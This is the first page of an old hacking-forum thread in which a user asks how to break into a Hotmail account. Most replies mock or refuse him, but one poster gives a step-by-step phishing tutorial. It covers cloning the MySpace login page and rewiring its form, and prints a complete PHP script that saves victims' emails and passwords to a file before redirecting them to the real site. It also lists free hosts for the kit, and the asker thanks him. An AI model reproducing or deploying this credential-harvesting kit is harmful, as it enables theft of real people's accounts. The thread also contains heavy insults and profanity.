Follow us on Twitter!
Your life is ending one minute at a time. If you were to die tomorrow, what would you do today?
Thursday, April 17, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 20
Guests Online: 18
Members Online: 2

Registered Members: 82815
Newest Member: medjiking
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general

Page 1 of 5 1 2 3 4 > >>
Author

How to access a Hotmail

Your avatar

Posted on 24-03-08 01:28
I want to learn to access a hotmail account...

Is there anyone here willing to help me???

Edited by on 24-03-08 02:01
Author

RE: I Need to access a Hotmail

Your avatar

Posted on 24-03-08 01:33
Yeah its called google

and if that's too complicated you should just throw your computer out the window right now.

Don't come to our site asking "how to hack this and that", cuz most people will flame you worst then I will.

We are here to help you learn, not to emphasize skiddie hotmail password stealing

and if I AM wrong and you are doing this for a LEGITIMATE reason...highly unlikely...like I said try google.

Author

shadowls
You Like this!

God
Posted on 24-03-08 01:35
flameage!!!!!!! damn that was harsh.

If you think my post are useful to you, please vote for them. Thank You

knowledge is powerful itself - SHADOWLS

i41.tinypic.com/mjwz7t.jpg

Made by:agentmax69, but remastered by: KvK

Coffee
None None
Author

Your avatar

Posted on 24-03-08 01:38
I have tried Google, I am willing to learn, if you cannot help me learn, then don't post in my threads...
Author

Your avatar

Posted on 24-03-08 01:43
helping you steal password accounts is not learning. Like I said I'm not even flaming half as hard as certain people would...but I'm dropping it at this: If your trying to get hotmail passwords, your not at this site for the right reasons. There, I've said my piece, I won't mention this again, so don't bother re-flaming, because to tell you the truth? I just plain don't care.

Author

spyware

God
Warn Level: 90
Posted on 24-03-08 01:44
Ah, Hotmail, always nice to see old friends dropping by.

Listen, Mrniceguy, I'm going to need you to pay close attention to what I am about to say, for it is vital for your very survival.

Stop, asking, stupid, quesions. Stop demanding things that are simply out of your reach. Stop trying to climb mountains without preparations.

You are an idiot. Every single cell in your body tells me to vomit.

I want you to shut up, turn around, walk away and never come back.

img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
[/s
http://bitsofspy.net
Author

Your avatar

Posted on 24-03-08 01:51
Getting passwords is learning, and that is not the reason why I came to this site, I joined over a month ago. Like I said, if you are not willing to help me then dont fucking post in my thread!! I wasn't the one flaming you were.
Author

RE: How to access a Hotmail

Your avatar

Posted on 24-03-08 02:02
Well, if you have done all the challenges in this site, you should be able to know the concept how to get the password or perhaps login to the account.. so you should learn from basic before try to hack Microsoft.. lol..

Author

Your avatar

Posted on 24-03-08 02:14
I don't have time to learn how to complete all those challenges b/c I have no reason to learn them right now. I guess all you white hat mother fuckers can just take your precious knowledge that you may or may not have and shove it up your ass!
Author

Your avatar

Posted on 24-03-08 02:19
get one thing strait this is not your thread. it could easily be deleted out of existence just like your account on here. please think before you speak dumb shit. do some challenges and learn some concepts before trying more advanced things.

also we are not all white hats. there are also grey hats. its just that people do not tend to like idiots. also why do you need to know about accessing a hot mail account.

Author

Your avatar

Posted on 24-03-08 02:25
Okay, well I guess HBH isn't the place for me b/c i'm not gonna do all the challenges before I can ask ppl to share some knowledge that they might have with me.
Author

spyware

God
Warn Level: 90
Posted on 24-03-08 02:26
Holy shit. You people actually believe that the challenges that HBH provides are actually a learning ground for the big stuff, for hacking Hotmail for example?

WAKE UP, FOOLS. You are blind and deaf! Stop thinking and start listening, you have much to listen to.

Fallingmidget, listen, very sweet of you trying to give some good advice, truth is, you can't. So don't, just play dummy until you can play ball, okay?

OP, seriously, asking for help AND calling us names isn't a great combo. Enjoy your nine to five job, say hello to your avarage life for me.

Everyone else, get a drink and chill out for a second.

img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
[/s
http://bitsofspy.net
Author

Your avatar

Posted on 24-03-08 02:29
sorry spy. i was just trying to help someone out.

i don't believe the challenges teach you things but they provided a sense as to what to look up and read about next.

Author

Your avatar

Posted on 24-03-08 02:36
@ spyware

You were the one who started the name calling. I obviously asked the wrong question on here to begin with, I don't see how I was acting like an idiot though. I was just wanting to learn something, and thought this was the best place to learn it, but I guess not. I will have to go elsewhere to find my answers.
Author

Your avatar

Posted on 24-03-08 02:47
It's not really that hard. You need to set up a phishing page and be creative. Social engineering will play a big role in this. Here's a tutorial I wrote a long long time ago and just tells you how to set up a phishing page as simply as can be.

We'll use myspace as a guinea pig since it's the most popular.

* go to myspace.com
* Press ctrl+s
* Make sure file type is web page, complete. This will save the main page (whatever you choose the page to be saved as) and then it will save all the files to embed and add in a folder. You don't need to worry about it whatsoever.
* Open up the index file (or file name you saved it under)
* Find out form values. Lucky for you I already got them.

email: ctl00$Main$SplashDisplay$ctl00$Email_Textbox
pass: ctl00$Main$SplashDisplay$ctl00$Password_Textbox
* Now, were going to edit these in our page. Well make email email, and pass pass.(to make it easier for our PHP). Now that we got that, we'll just set the form action to file.php (or whatever you choose to name it).
* Now that we've got all that set, open file.php and input:

Code

<?php
      $pass = $_POST['pass'];
      $email = $_POST['email'];
      $values = "<b>Email:</b> $email <b>Pass:</b> $pass<br />";
      $file = fopen('accounts.html', "a") or die('Error');
      fwrite($file, $values);
      fclose($file);
      header('location: http://www.myspace.com');
      ?>

* ^^This will just redirect them to myspace. You could use cURL(A php extension) and spoof the post values to actually log them in after writing the values to your accounts.html page. Now that it's set up, you can upload the files to a place like www.freehostia.com 110mb.com zendurl.com 789mb.com theres all kinds.

But if you were actually talking about hacking hotmail...lol it's just not going to happen. Anyways most of the challenges here are to cover simple exploits most of which are PHP/SQL

Edited by on 24-03-08 02:47
Author

Your avatar

Posted on 24-03-08 02:48
to me you sounded like an idiot because it was sounding like you just want a answer and once you got it and applied it you would just move on and forget it and not learn from it. sorta like a spoon feed. go on you tube an I'm sure you'll find out a lot of what you want to know.

if you are going to ask a question try and think of how someone can get pissed off at you because of it and use that to ask it right.

I'm just trying to help.

Edited by on 24-03-08 02:52
Author

Your avatar

Posted on 24-03-08 02:56
Thanks splctrl.

And thanks for clearing that up fallingmidget, I can see where you all were coming from.
Author

Your avatar

Posted on 24-03-08 03:00
just please don't let the flamming affect whether or not you are going to continue to try and learn.

Author

Your avatar

Posted on 24-03-08 03:02
Oh I was definitely going to keep learning, but thanks for your concern.
Author

shadowls
You Like this!

God
Posted on 24-03-08 03:20
MrN1ce9uy wrote:
I don't have time to learn how to complete all those challenges b/c I have no reason to learn them right now. I guess all you white hat mother fuckers can just take your precious knowledge that you may or may not have and shove it up your ass!

Well that says it all, if you don't have time to learn, how are you supposed get better, how do you learn? by doing problems and stuff right?

If you think my post are useful to you, please vote for them. Thank You

knowledge is powerful itself - SHADOWLS

i41.tinypic.com/mjwz7t.jpg

Made by:agentmax69, but remastered by: KvK

Coffee
None None
Page 1 of 5 1 2 3 4 > >>